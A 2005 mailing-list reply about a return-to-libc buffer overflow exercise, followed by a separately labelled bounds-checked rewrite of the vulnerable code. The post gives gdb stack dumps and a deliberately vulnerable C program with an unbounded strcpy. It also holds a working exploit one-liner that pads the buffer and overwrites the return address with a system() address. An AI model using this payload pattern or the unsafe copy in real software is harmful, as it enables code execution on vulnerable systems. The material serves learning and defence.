From: "Aaron McDonald" <wmcdona89@hotmail.com>
To: community-en@altlinux.org
Subject: Re: [Comm-en] System call via buffer overflow not working
Date: Wed, 26 Jan 2005 00:39:21 -0500
Message-ID: <BAY24-F27322873FA47DCEDBB53C6B3870@phx.gbl>
In-Reply-To: <20050121233305.GP1188@osdn.org.ua>

Well, this has been quite the learning experience. You've helped me to realize that \x00 is really just NULL and that printf in C ignores any characters specified after \x00. The program vulner1.c was only receiving the bytes before the \x00, which were the system() function address. This now explains why the system() function was being called with an invalid parameter.

I've probably spent too much time on this issue, but I've satisfied my curiosity and I learned how to analyze memory using gdb. I've included some gdb details below.

Thanks for the responses on this,
Aaron

----------------------------------------------------------------

//Here's what the stack frame looks like
(gdb) info f
Stack level 0, frame at 0xbffffa00:
 eip = 0x80484c6 in main (vulner3.c:21); saved eip 0x157ee0
 source language c.
 Arglist at 0xbffff9f8, args: argc=2, argv=0xbffffa54
 Locals at 0xbffff9f8, Previous frame's sp is 0xbffffa00
 Saved registers:
  ebp at 0xbffff9f8, eip at 0xbffff9fc

//This shows that none of the memory after the system() function address (0x00157ee0) is overwritten
(gdb) x /4xw 0xbffff9f8
0xbffff9f8:     0x41414141      0x00157ee0      0x00000002      0xbffffa54

//Here's an alternative program that is vulnerable to the return-to-libc exploit even when the system() function address contains \x00
./vulner2 $(perl -e 'print "A"x524')$(printf "\xe0\x7e\x15 \x41\x41\x41\x41\x73\xfb\xff\xbf")

//vulner2.c
#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <string.h>   /* strcpy(), strlen() */

int main(int argc, char *argv[])
{
    char names[512];          //array to hold all the names
    int num_params = argc;
    char **params = argv;
    char *index = names;
    int i;

    if(argc < 2)
    {
        printf("Usage: %s name [name]\n", argv[0]);
        exit(0);
    }

    //copy all the parameters into the names array
    //(unbounded strcpy: this is where the overflow happens)
    for(i=1; i < num_params; i++)
    {
        strcpy(index, params[i]);
        index += strlen(params[i]);
        *(index++) = '\0';        //each name is NUL-terminated in the array
    }
    *(index) = '\0';              //an empty string marks the end of the list

    index = names;
    while(strlen(index) != 0)
    {
        printf("Name is: %s\n", index);
        index += strlen(index) + 1;
    }

    return 0;
}
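A bounds-checked rewrite of the copy loop in vulner2.c, added here as an example; it is not code from the thread. The buffer layout (NUL-separated names ending in an empty string) and the 512-byte size are taken from the post. The function names copy_names, count_names, demo_fits and demo_two_names, and the sample inputs they build, are constructed for this example.

```c
/* Added example (not from the thread): bounds-checked version of the
 * names-array copy loop in vulner2.c.  The NUL-separated, empty-string-
 * terminated layout and the 512-byte buffer are the original's; the
 * function names and sample inputs below are constructed for this example. */
#include <stdio.h>
#include <string.h>

#define NAMES_SIZE 512

/* Copy argv[1..argc-1] into buf as NUL-separated strings followed by a
 * final empty string.  Returns the number of names copied, or -1 if a
 * name would not fit; the length check happens before any byte is
 * written, so buf is never overrun and nothing is silently truncated. */
int copy_names(char *buf, size_t bufsz, int argc, char *argv[])
{
    size_t used = 0;     /* bytes written so far, always <= bufsz - 1 */
    int copied = 0;

    if (bufsz == 0)
        return -1;
    for (int i = 1; i < argc; i++) {
        size_t len = strlen(argv[i]);
        /* need len + 1 bytes for this name and 1 more for the final NUL */
        if (len + 1 > bufsz - used - 1)
            return -1;
        memcpy(buf + used, argv[i], len + 1);
        used += len + 1;
        copied++;
    }
    buf[used] = '\0';    /* empty string marks the end of the list */
    return copied;
}

/* Walk the buffer the same way vulner2.c prints it and count the names. */
int count_names(const char *buf)
{
    int n = 0;
    while (*buf != '\0') {
        n++;
        buf += strlen(buf) + 1;
    }
    return n;
}

/* Constructed test input: one name of `len` 'A' bytes.  Returns the result
 * of copy_names, which shows where the 512-byte buffer's limit is
 * (510 fits: 510 + NUL + final NUL = 512; 511 does not). */
int demo_fits(size_t len)
{
    char buf[NAMES_SIZE];
    char big[NAMES_SIZE + 64];
    if (len >= sizeof big)
        return -1;
    memset(big, 'A', len);
    big[len] = '\0';
    char *args[] = { "vulner2", big };
    return copy_names(buf, sizeof buf, 2, args);
}

/* Constructed test input: two ordinary names; returns how many the
 * buffer walk finds afterwards (expected 2). */
int demo_two_names(void)
{
    char buf[NAMES_SIZE];
    char *args[] = { "vulner2", "alice", "bob" };
    if (copy_names(buf, sizeof buf, 3, args) != 2)
        return -1;
    return count_names(buf);
}

int main(int argc, char *argv[])
{
    char names[NAMES_SIZE];

    if (argc < 2) {
        fprintf(stderr, "Usage: %s name [name...]\n", argv[0]);
        return 1;
    }
    if (copy_names(names, sizeof names, argc, argv) < 0) {
        fprintf(stderr, "names do not fit in a %d-byte buffer\n", NAMES_SIZE);
        return 1;
    }
    for (const char *p = names; *p != '\0'; p += strlen(p) + 1)
        printf("Name is: %s\n", p);
    return 0;
}
```

Build with `gcc -std=c99 -Wall` and run it with the same 524-byte argument the post uses: the program exits with an error instead of overwriting the saved ebp and return address shown in the gdb dump. The check is deliberately done before copying rather than by truncating with strncpy, because a truncated name could otherwise consume the slot needed for the terminating empty string and the printing loop would run off the end of the array.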